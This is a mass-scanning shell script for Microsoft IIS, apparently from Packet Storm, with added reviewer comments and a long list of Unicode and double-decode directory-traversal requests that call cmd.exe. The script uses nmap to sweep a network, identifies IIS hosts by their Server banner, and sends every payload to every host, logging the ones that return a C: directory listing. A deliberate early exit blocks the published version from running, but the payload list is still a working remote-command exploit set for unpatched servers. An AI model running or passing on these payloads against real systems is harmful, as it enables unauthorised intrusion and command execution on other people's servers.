IIS Scanner
You can also find this script at http://packetstormsecurity.com/
head.cmd
HEAD / HTTP/1.0
iisscan.sh
#!/bin/sh
# A Simple IIS network scanner
# ./iisscan.sh 10.*.54.3-23 output
# http://www.bastardo.de(Apache) ;)
#
# Structure (review notes):
#   1. nmap sweep of $1 on port 80 -> list of hosts with port 80 open in $2
#   2. HEAD request to each host with netcat; only hosts whose Server
#      header mentions "IIS" are kept -> $2 is rewritten to that host list
#   3. every request line of unicodes.txt is sent to every remaining host;
#      a host whose reply contains 'Directory of c:' is appended to $2.exp
# Arguments: $1 = nmap target spec (also embedded in scratch file names)
#            $2 = output file name
# Exit status: 1 whenever a stage finds nothing, 0 after stage 3 completes,
#              and also 0 on a usage error (see below).
# Nothing in this script is quoted; $1, $2 and each host name are expanded
# unquoted into file names, command lines and a sed expression.
# Scratch files ($1.out, hosts.$1.tmp, fluff) are created with fixed,
# predictable names in the current directory.
clear
# Require exactly two positional arguments.
if [ $# -ne 2 ]
then
echo "$0 [ip room] [outputfile]" >&2
# The usage error exits with status 0, so a caller cannot tell it from success.
exit 0
else
echo "Written by cd ;)"
# The ';exit 1' on the next line ends the script here: in the published
# form, no line after it is ever reached.
echo "ScR1p7k1dDi3 Pr0t3c7 Sy5t3m v 1.o";exit 1
echo "Scan started against to $1 on port 80"
echo "This can take a while"
# Stage 1: SYN scan (-sS) of $1 on port 80, grepable output (-oG) to $1.out;
# only the "Host" lines of nmap's stdout are shown on the terminal.
nmap -T Aggressive -v -v -sS $1 -p 80 -oG $1.out | grep Host
# Keep lines mentioning "open" and take the second space-separated field
# (the address) as the host list in $2.  '-d ' is the same as -d ' '.
cat $1.out | grep open | cut '-d ' -f 2 > $2
fi
rm $1.out
# "Is $2 empty?" via its byte count; the sum/expr steps only copy wc's output.
sum=0
g=`cat $2 | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
then
echo "
No matches of any http server!!!
Thanks for use ..."
rm $2
exit 1
fi
echo "Please wait...
Testing server versions"
# Stage 2: banner grab.  head.cmd (the single line 'HEAD / HTTP/1.0') is sent
# to each host on port 80 with a 5 s timeout.  The Server header is kept, its
# "Server:" prefix replaced by the host name, and only lines containing "IIS"
# are appended to hosts.$1.tmp.  Identification rests entirely on the banner
# text, so a host with a missing or rewritten Server header is never listed.
# $host is interpolated unquoted into the sed expression; a value containing
# '/' or other sed metacharacters would break it.
while read host ;
do
echo " Get http server version from: $host"
netcat -w 5 $host 80 < head.cmd | grep "^Server: " | sed "s/^Server:/$host/" | grep "IIS" >>hosts.$1.tmp
done < $2
# Same empty-file check on the banner results.
sum=0
g=`cat hosts.$1.tmp | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
then
echo "
No matches of IIS
Thanks for use ..."
rm hosts.$1.tmp
rm $2
exit 1
fi
# Rewrite $2 with just the host column of the banner results.
rm $2
cat hosts.$1.tmp | cut '-d ' -f 1 > $2
rm hosts.$1.tmp
# Stage 3: replay every line of unicodes.txt against every host in $2.
touch $2.exp
while read host;
do
echo "Try to Exploit $host"
# 'read' without -r and 'echo' both interpret backslashes in some shells, so
# lines of unicodes.txt that contain '\' may not be sent verbatim.
while read unicodes;
do
# One request line per connection, 10 s timeout; the reply is searched for
# the string 'Directory of c:' and any match written to the scratch file
# fluff (overwritten on every iteration).
echo "$unicodes" | netcat -w 10 $host 80 | grep 'Directory of c:' >fluff
sum=0
g=`cat fluff | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
then
echo "try $unicodes"
else
# A non-empty fluff means the reply contained the marker string; the host is
# appended once per matching request line, so $2.exp may hold duplicates.
echo "$host is Exploitable with $unicodes"
echo $host >>$2.exp
fi
done < unicodes.txt
done < $2
rm fluff
# Exit 1 and remove $2.exp when no host matched in stage 3; $2 is kept.
sum=0
g=`cat $2.exp | wc -c`
sum=`expr $sum + $g`
if [ $sum = 0 ]
then
rm $2.exp
echo "
No matches of Exploitable IIS
In >> $2 << you can find the IIS in this network
Thanks for use ...
"
exit 1
fi
echo "
You can find a list of Exploitable IIS in >> $2.exp <<
and in >> $2 << you can find the IIS in this network
Thanks for use ...
"
an old list of Unicodes
unicodes.txt
GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir GET /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir GET /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET 
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir GET /msaDC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir GET /msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir GET /msaDC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir GET /msaDC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir GET /msadc/..%c1%af../winnt/system32/cmd.exe?/c+dir GET /msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir GET /msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir GET /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir GET /msadc/..%e0%80%af../winnt/system32/cmd.exe?/c+dir GET /msadc/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir GET /msadc/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir GET /msadc/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir GET /msadc/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir GET /msadc/..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../..\ HTTP/1.1%e0\ HTTP/1.1%80\ HTTP/1.1%af../winnt/system32/cmd.exe\ HTTP/1.1?/c\ HTTP/1.1+dir GET 
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir GET /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir GET /scripts/root.exe?/c+dir GET /msadc/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir